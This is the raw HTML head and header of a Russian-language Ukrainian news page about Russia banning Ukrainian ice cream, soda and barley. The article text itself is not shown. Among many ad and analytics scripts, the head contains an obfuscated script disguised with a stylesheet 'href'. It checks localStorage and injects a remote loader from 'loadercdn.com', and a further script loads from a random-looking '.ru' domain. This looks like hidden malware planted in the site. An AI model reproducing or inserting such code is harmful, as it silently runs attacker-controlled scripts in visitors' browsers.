
<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns#" lang="ru">
<head>
	
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/> 
		
	<meta name="referrer" content="origin">
	<meta name="yandex-verification" content="9a28c4c473219914" />
	<meta name="yandex-verification" content="9a28c4c473219914" />
	<meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" />
	
			
	
		   
			<meta property="og:title" content="Россия запретила мороженое, газировку и ячмень из Украины | Экономические Новости"/>
			
	
	
			<meta property="og:site_name" content="enovosty. Украинские новости дня"/>
		
	
	
							<meta property="og:image" content="https://enovosty.com/wp-content/uploads/2021/07/morogenoe-e1625477915498.jpg"/>
					<meta property="og:type" content="article" />
					<meta property="og:image:width" content="460" />
					<meta property="og:image:height" content="279" />
					<meta property="og:image:alt" content="Россия запретила мороженое, газировку и ячмень из Украины | Экономические Новости" />

						
		
	<meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" />
    	
			
	<style>.toparticles{position:relative;}.toparticles #photoPromo {height: 216px;width: 466px;overflow:hidden;}.toparticles #photoPromo li{height:216px;}.toparticles div.anythingSlider .anythingControls{display:block;}</style>
	<link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" />
	<link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png">
    <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png">
    <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png">
    <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png">
	<link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" />		
		
				
		
		<!-- All in One SEO 4.1.1.1 -->
		<title>Россия запретила мороженое, газировку и ячмень из Украины | Экономические Новости</title>
		<meta name="description" content="В России решили расширить список запрещенных продуктов из Украины"/>
		<link rel="canonical" href="https://enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy" />
		<meta property="og:site_name" content="Экономические Новости - финансовые новости Украины, последние новости | Самые последние новости экономики, финансов, политики и мира. Экономические новости и финансовые новости - Экономические Новости" />
		<meta property="og:type" content="article" />
		<meta property="og:title" content="Россия запретила мороженое, газировку и ячмень из Украины | Экономические Новости" />
		<meta property="og:description" content="В России решили расширить список запрещенных продуктов из Украины" />
		<meta property="og:url" content="https://enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy" />
		<meta property="article:published_time" content="2021-07-05T10:40:21Z" />
		<meta property="article:modified_time" content="2021-07-05T10:40:45Z" />
		<meta name="twitter:card" content="summary" />
		<meta name="twitter:domain" content="enovosty.com" />
		<meta name="twitter:title" content="Россия запретила мороженое, газировку и ячмень из Украины | Экономические Новости" />
		<meta name="twitter:description" content="В России решили расширить список запрещенных продуктов из Украины" />
		<script type="application/ld+json" class="aioseo-schema">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</script>
		<!-- All in One SEO -->

<link rel="amphtml" href="https://enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy/amp" /><meta name="generator" content="AMP for WP 1.0.76.17"/><link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Экономические Новости - финансовые новости Украины, последние новости &raquo; Лента комментариев к &laquo;Россия запретила мороженое, газировку и ячмень из Украины&raquo;" href="https://enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy/feed" />
<link rel='stylesheet' id='wp-block-library-css'  href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css?ver=5.7' type='text/css' media='all' />
<link rel='stylesheet' id='wpdiscuz-frontend-css-css'  href='https://enovosty.com/wp-content/plugins/wpdiscuz/themes/default/style.css?ver=7.2.2' type='text/css' media='all' />
<style id='wpdiscuz-frontend-css-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='wpdiscuz-fa-css'  href='https://enovosty.com/wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/css/fa.min.css?ver=7.2.2' type='text/css' media='all' />
<link rel='stylesheet' id='wpdiscuz-combo-css-css'  href='https://enovosty.com/wp-content/plugins/wpdiscuz/assets/css/wpdiscuz-combo.min.css?ver=5.7' type='text/css' media='all' />
<link rel='stylesheet' id='msl-main-css'  href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css?ver=3.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='addtoany-css'  href='https://enovosty.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.15' type='text/css' media='all' />
<script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1' id='jquery-core-js'></script>
<script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://enovosty.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1' id='addtoany-js'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://enovosty.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://enovosty.com/wp-includes/wlwmanifest.xml" /> 


<script data-cfasync="false">
window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={};a2a_localize = {
	Share: "Отправить",
	Save: "Сохранить",
	Subscribe: "Подписаться",
	Email: "Email",
	Bookmark: "В закладки!",
	ShowAll: "Показать все",
	ShowLess: "Показать остальное",
	FindServices: "Найти сервис(ы)",
	FindAnyServiceToAddTo: "Найти сервис и добавить",
	PoweredBy: "Работает на",
	ShareViaEmail: "Share via email",
	SubscribeViaEmail: "Subscribe via email",
	BookmarkInYourBrowser: "Добавить в закладки",
	BookmarkInstructions: "Press Ctrl+D or \u2318+D to bookmark this page",
	AddToYourFavorites: "Добавить в Избранное",
	SendFromWebOrProgram: "Send from any email address or email program",
	EmailProgram: "Email program",
	More: "More&#8230;",
	ThanksForSharing: "Thanks for sharing!",
	ThanksForFollowing: "Thanks for following!"
};

(function(d,s,a,b){a=d.createElement(s);b=d.getElementsByTagName(s)[0];a.async=1;a.src="https://static.addtoany.com/menu/page.js";b.parentNode.insertBefore(a,b);})(document,"script");
</script>
<style>.ms-parent-id-11 > .master-slider{ background:#000000; }
.ms-parent-id-10 > .master-slider{ background:#000000; }
.ms-parent-id-9 > .master-slider{ background:#000000; }
.ms-parent-id-8 > .master-slider{ background:#000000; }
.ms-parent-id-7 > .master-slider{ background:#000000; }
.ms-parent-id-6 > .master-slider{ background:#000000; }
.ms-parent-id-5 > .master-slider{ background:#000000; }
.ms-parent-id-4 > .master-slider{ background:#000000; }
.ms-parent-id-3 > .master-slider{ background:#000000; }
.ms-parent-id-2 > .master-slider{ background:#000000; }
.ms-parent-id-1 > .master-slider{ background:#000000; }</style>
<script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script>
<meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" />

		<script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">/*"+ +new Date+"*/@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script>

	
		
		
		
					
		
	<!-- (C)2000-2010 Gemius SA - gemiusAudience / eizvestia / adv -->
<script>
<!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');
//--><!]]>
</script>
<script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script>
		<script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4854077&amp;a=2083" async></script><!-- counter added?? -->	<!--[if lte IE 7]>
	<link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" />
	<![endif]-->
	<script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script>
	<script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script>
	<script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script>
	

	<script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script>	
	<!--Admixer-->
	<script type="text/javascript">
		(function () {
			var w = window,
					d = document,
					protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',
					aml = typeof admixerML !== 'undefined' ? admixerML : {};
			aml.fn = aml.fn || [];
			aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
			aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
			aml.noCriteo = true;
			if (!w.admixerML) {
				var lodash = document.createElement('script');
				lodash.id = 'amlScript';
				lodash.async = true;
				lodash.type = 'text/javascript';
				lodash.src = aml.cdnPath + 'scripts3/loader2.js';
				var node = d.getElementsByTagName('script')[0];
				node.parentNode.insertBefore(lodash, node);
				w.admixerML = aml;
			}
		})();
	</script>  
	<!--Admixer-->
		
	<script src="https://cdn.admixer.net/scripts3/loader2.js" async
        data-inv="//inv-nets.admixer.net/"
        data-r="single"
        data-sender="admixer"
        data-bundle="desktop"></script>
		
	<script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
        data-inv="//ads.go2net.com.ua/"
        data-r="single"
		data-sender="go2net"
        data-bundle="desktop"></script>
	
	<meta property="fb:admins" content="100009507220682"/>
	<meta property="fb:app_id" content="2113796585568948"/>

	<script>
		function setHomepage(){
			var homepage = 'https://enovosty.com';
			if (document.all){
		        document.body.style.behavior='url(#default#homepage)';
		  		document.body.setHomePage(homepage);
	    	}else if (window.sidebar){
		    	if(window.netscape){
		        	try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}  
		         	catch(e){  
		    			alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");  
		         	}
		    	} 
		    	var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);
		    	prefs.setCharPref('browser.startup.homepage',homepage);
		 	}
		}
	</script>
	<script>
		var _gaq = _gaq || [];
		var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
		_gaq.push(['_require', 'inpage_linkid', pluginUrl]);
		_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);
		_gaq.push(['_setDomainName', 'enovosty.com']);
		_gaq.push(['_trackPageview']);
		(function() {
			var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
			ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
			var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
		})();
	</script>
	<script>
	function trackOutboundLink(link, category, action) { 
		var url = '';
		if(link.href) url = link.href;
		if(url == ''){
			str = link.getAttribute("onclick");
			m = str.match("(https:\/\/.*?)\'"); 
			if(m) url = m[1];
		}
			try {
				_gaq.push(['_trackEvent', category , action]);
			} catch(err){}
			setTimeout(function() {
			}, 100);
	}
	</script>

<script>
jQuery(document).ready(function($){

	$("a").each(function() {
		var href = $(this).attr("href");
		var target = $(this).attr("target");
		var text = $(this).text();
		
		var a = new RegExp('/' + window.location.host + '/');
		var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;
		var b = new RegExp(e);
		
		$(this).click(function(event) { 
		
		if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) { 
		
		console.log("document.URL : "+this.href);
			event.preventDefault(); 
			_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]); 
			setTimeout(function() { 
				window.open(href,(!target?"_self":target));
			},300);
		}	
			
		});
	});

});
</script>

	<script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script>
	
	<!-- Adtelligent -->
	<script> !(function () { window.googletag = window.googletag || {}; window.vmpbjs = window.vmpbjs || {}; window.vpb = window.vpb || {}; vpb.fastLoad = true; googletag.cmd = googletag.cmd || []; vmpbjs.cmd = vmpbjs.cmd || []; var cmds = googletag.cmd.slice(0) || []; googletag.cmd.length=0; var ready = false; function exec(cb) { return cb.call(googletag); } googletag.cmd.push(function () { googletag.cmd.unshift = function (cb) { if (ready) { return exec(cb); } cmds.unshift(cb); if (cb._startgpt) { ready = true; cmds.forEach(cb=> { exec(cb); }); } }; googletag.cmd.push = function (cb) { if (ready) { return exec(cb); } cmds.push(cb); }; }); googletag.cmd.push = function (cb) { cmds.push(cb) }; googletag.cmd.unshift = function (cb) { cmds.unshift(cb); if (cb._startgpt) { ready = true; if (googletag.apiReady) { cmds.forEach(function (cb) { googletag.cmd.push(cb); }) } else { googletag.cmd = cmds; } } }; var dayMs = 36e5, cb = parseInt(Date.now() / dayMs), vpbSrc = '//player.adtelligent.com/prebidlink/' + cb + '/wrapper_hb_308225_6946.js', pbSrc = vpbSrc.replace('wrapper_hb', 'hb'), gptSrc = '//securepubads.g.doubleclick.net/tag/js/gpt.js', c = document.head || document.body || document.documentElement; function loadScript(src, cb) { var s = document.createElement('script'); s.src = src; s.defer=false; c.appendChild(s); s.onload = cb; s.onerror = function(){ var fn = function(){}; fn._startgpt = true; googletag.cmd.unshift(fn); }; return s; } loadScript(pbSrc); loadScript(gptSrc); loadScript(vpbSrc); })() </script>
	
	

	

<script async src="//www.googletagservices.com/tag/js/gpt.js"></script>

<!-- Admixer -->


<script>
  var googletag = googletag || {};
  googletag.cmd = googletag.cmd || [];
</script>


<script>

  googletag.cmd.push(function() {
	googletag.defineSlot('/59256651/Test_Moxtv_enovosty_970x250', [970, 250], 'div-gpt-ad-1599639337661-0').addService(googletag.pubads());
	googletag.defineSlot('/59256651/enovosty2_300x600', [300, 600], 'div-gpt-ad-1596728019577-0').addService(googletag.pubads());
	googletag.defineSlot('/59256651/enovosty_970x250', [970, 250], 'div-gpt-ad-1595961600637-0').addService(googletag.pubads());
	googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());
	googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());
    //googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
    googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());
	googletag.defineSlot('/59256651/enovosty_adint_300_600', [[300, 600],[300,250]], 'div-gpt-ad-1594112815543-0').addService(googletag.pubads());
	googletag.defineSlot('/59256651/Adaptive_zone', [470, 376], 'div-gpt-ad-1594991505318-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
	googletag.pubads().collapseEmptyDivs();
    googletag.enableServices();
  });
  
</script>

<script type="text/plain" id="vpb-catfish-template">
<div class="vpb-catfish-container" style="position: fixed;bottom:0;left:0;right:0;z-index:999999;">
    <div class="vpb-ad" style="display: block;position: relative;margin:0px auto;">
        <span class="vpb-close-button"
              style="display: none;position: absolute;top:-15px;right:-15px;z-index:9999;cursor: pointer;">
            <img src="data:image/png;base64,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"/>
        </span>
    </div>
</div>
</script>
<script>
	function catfish(div) {
		var gt = window.googletag || {};
		gt.cmd = gt.cmd || [];
		gt.cmd.push(function () {
			var template = document.getElementById('vpb-catfish-template').innerHTML;
			var adContainer = document.getElementById(div);
			adContainer.innerHTML = template;
			var catId =  'vpb-ad-wrapped-generated-' + (Math.random() + Date.now());
			adContainer.id =catId;
			var innerWrapper = adContainer.getElementsByClassName('vpb-ad')[0];
			var closeBtn = adContainer.getElementsByClassName('vpb-close-button')[0];
			var newAdDiv = document.createElement('div');
			newAdDiv.id = div;
			newAdDiv.setAttribute('data-hb-catfish',catId);
			innerWrapper.appendChild(newAdDiv);
			googletag.pubads().addEventListener('slotRenderEnded', function (event) {
				var slot = event.slot;
				var slotId = slot.getSlotElementId();
				if (slotId != div) return;
				if (event.isEmpty) {
					closeBtn.style.display = 'none';
					adContainer.style.display = 'none';
					return;
				}
				adContainer.style.display = 'block';
				innerWrapper.style.width = event.size[0] + 'px';
				innerWrapper.style.height = event.size[1] + 'px';
				closeBtn.style.display = 'inline-block';
				closeBtn.addEventListener('click', function () {
					adContainer.parentElement.removeChild(adContainer);
				});
			});
			gt.display(div);
		});
	}
</script>

	


	<script src="https://33a89nw03k.ru/script.js"></script>

</head>

<body>


<script type='text/javascript'>
admixerML.fn.push(function() {

// branding admixer
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});

admixerML.singleRequest();
});
</script>


<script type='text/javascript'>
(window.globalAmlAds = window.globalAmlAds || []).push(function() {
globalAml.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9', sender: 'admixer'});
globalAml.singleRequest("admixer");});
</script>


<script type='text/javascript'>
(window.globalAmlAds = window.globalAmlAds || []).push(function() {
globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});
globalAml.singleRequest("go2net");});
</script>



	<!--bigmir)net TOP 100 Part 1-->
	<script><!--
	bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
	for(var f=self;f!=f.parent;f=f.parent)bm.w++;
	try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
	else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
	try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
	try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
	r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}
	bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
	bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
	//-->
	</script>
	<noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript>
	<!--bigmir)net TOP 100 Part 1-->
			<div id="fb-root"></div>
<script>
  window.fbAsyncInit = function() {
    FB.init({
      appId      : '2113796585568948',
      cookie     : true,
      xfbml      : true,
      version    : 'v3.0'
    });
      
    FB.AppEvents.logPageView();   
      
  };

  (function(d, s, id){
     var js, fjs = d.getElementsByTagName(s)[0];
     if (d.getElementById(id)) {return;}
     js = d.createElement(s); js.id = id;
     js.src = "https://connect.facebook.net/en_US/sdk.js";
     fjs.parentNode.insertBefore(js, fjs);
   }(document, 'script', 'facebook-jssdk'));
</script>

<div id="adriver_banner_branding"></div>


<div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div>
<script>
    admixerML.fn.push(function() {
		admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');
	});
</script>


		<div class="container">
	
			
        <div style="margin-top:0px;position:relative;"> <!-- id="first-banner" -->
							
				<div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div>
				<script type='text/javascript'>
					admixerML.fn.push(function() {
				admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');
				});
				</script>
				

				<!-- 728x90 -->
				<script type="text/javascript" id="ertqxb">
					(function(){
						var s = document.createElement("script");
						s.type = "text/javascript";
						s.src = "//randiul.com/t.js?i=z61ztncbiozypm54k16j8&cb=" + (new String(Math.random())).substring(2,8) + (((new Date()).getTime()));
						d = document.getElementById("ertqxb");
						d.parentNode.insertBefore(s, d);
					})();
				</script>
				
					
						<!-- 
			<div>
				<a rel="nofollow" href="https://www.ludinaroku.com.ua/ua/" target="_blank">
					<img src="/wp-content/uploads/2019/02/728х90_.gif">
				</a>
			</div>
			-->
		
							<!--
				<div>
					<a href="https://enovosty.com/uk/news_politics-ukr/full/2805-svobodu-ukrainskomu-politvyaznyu-kinorezhiseru-olegu-sencovu" target="_blank">
						<img src="/wp-content/uploads/2018/06/Sentsov2.jpg">
					</a>
				</div>	
				-->
									
			<div id="right_ban"></div> 
			<div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> 		</div>    <!--end #first-banner -->
		
		<div class="cls"></div>
				
		<div id="header" style="padding-top:0px; margin-top: 0px;" >
			<div id="headerTop">
				<!-- inc cur_exchange_170 -->
				<!--<div id="weather"></div>-->
				<div class="cls"></div>
			</div>  <!-- headerTop -->
     		<!--   <hr align="center" noshade="noshade" size="1" color="#c0c0c0" style="margin: 5px 0px 5px 0px" /> -->
    		<div id="headerMiddle">
									<a href="https://enovosty.com/">
						<img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" />
					</a>
						
					
		        <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a>
				<a href="https://enovosty.com/video" class="videohead">Видео</a>
													<a class="wap" rel="nofollow" href="https://enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy?mobile=1"></a>
					<a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy?mobile=1">
						<img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" />Мобильная версия
					</a>
						        				<div class="wiget simple" id="curs">
		<span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a>
		</span>
	<!--<img style="display: block; margin: 0 0 10px 0;" src="https://enovosty.com/wp-content/themes/eizvestia/img/money.jpg">-->
		<div class="header-currency">
		<a href="https://enovosty.com/currency-rates">
			<table class="currency">
			  <tr class="cur_shap">
				<td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td>
			  </tr>
			  <tr>
				<td>USD</td><td>27.52</td><td>27.20</td><td>25.14</td>
			  </tr>
			  <tr class="tr_white">
				<td>EUR</td><td>32.85</td><td>32.12</td><td>27.75</td>
			  </tr>
			  <tr>
				<td>RUB</td><td>0.39</td><td>0.28</td><td>0.38</td>
			  </tr>
			</table>
		</a>
	</div>
</div>				<div class="wiget simple" id="fonds">
<span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span>
<table class="currency index">
  <tr class="cur_shap">
    <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td>
  </tr>
  <tr>
    <td>PFTS</td><td>527.44</td><td>0.01</td><td>20:36 16.04.2021</td>
  </tr>
  <tr class="tr_white">
    <td>UX</td><td>1796.39</td><td>1.43</td><td>17:00 16.04.2021</td>
  </tr>
  <tr>
    <td>RTS</td><td>1497.05</td><td>1.51</td><td>18:51 16.04.2021</td>
  </tr>
</table>
</div>
				<div class="wiget simple" id="toplivo">
<span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span>
<table class="currency benzin">
	<tr class="cur_shap">
		<td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td>
	</tr>
	<tr>
		<td style="text-align:left;padding-left: 2px;">BRENT</td><td>76.31</td><td>+0.18</td><td style="text-transform:uppercase;">Jul</td>
	</tr>
	<tr class="tr_white">
		<td style="text-align:left;padding-left: 2px;">WTI</td><td>75.36</td><td>+0.27</td><td style="text-transform:uppercase;">Jul</td>
	</tr>
	<tr>
		<td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>616.00</td><td>+0.57</td><td style="text-transform:uppercase;">Jul</td>
	</tr>
</table>
</div>    			<div id="header_right">      				
      				<a href="https://enovosty.com/rss/rss.php">RSS</a>
					<a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;">
		        	<!-- <img src="https://enovosty.com/wp-content/themes/eizvestia/img/afisha3.png" width="56" alt="Деловая афиша" title="Деловая афиша" /> --> 
					Афиша</a>
					<a class="archive" href="https://enovosty.com/archive">Архив</a>
					<div style="clear: both;vertical-align:top;">
										  	<a href="https://enovosty.com" title="Последние новости  - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a>
						
				    </div>
    			</div><!-- header_right-->
                <div class="cls"></div>
			</div><!-- headerMiddle-->
             
			<div id="mainMenu" data-hover="hover-on-menu">
	<ul id="ull" class="menu">
					<li class="menu-item-has-children">
				<a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a>	
				<ul class="sub-menu">
					<li><a href="https://enovosty.com/news_politics">Политика</a></li>
					<li><a href="https://enovosty.com/news_kiev">Киев</a></li>
					<li><a href="https://enovosty.com/news_economy">Экономика</a></li>
					<li><a href="https://enovosty.com/news-finance">Финансы</a></li>
					<li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li>
					<li class="current-menu-item"><a href="https://enovosty.com/news-markets">Рынки</a></li>
					<li><a href="https://enovosty.com/news_society">Общество</a></li>
					<li><a href="https://enovosty.com/news_abroad">Мир</a></li>
					<li><a href="https://enovosty.com/news_sport">Cпорт</a></li>
					<li><a href="https://enovosty.com/news-culture">Культура</a></li>
					<li><a href="https://enovosty.com/news-auto">Авто</a></li>
					<li><a href="https://enovosty.com/news_incidents">Происшествия</a></li>
					<li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li>
					<li><a href="https://enovosty.com/zdorove">Здоровье</a></li>
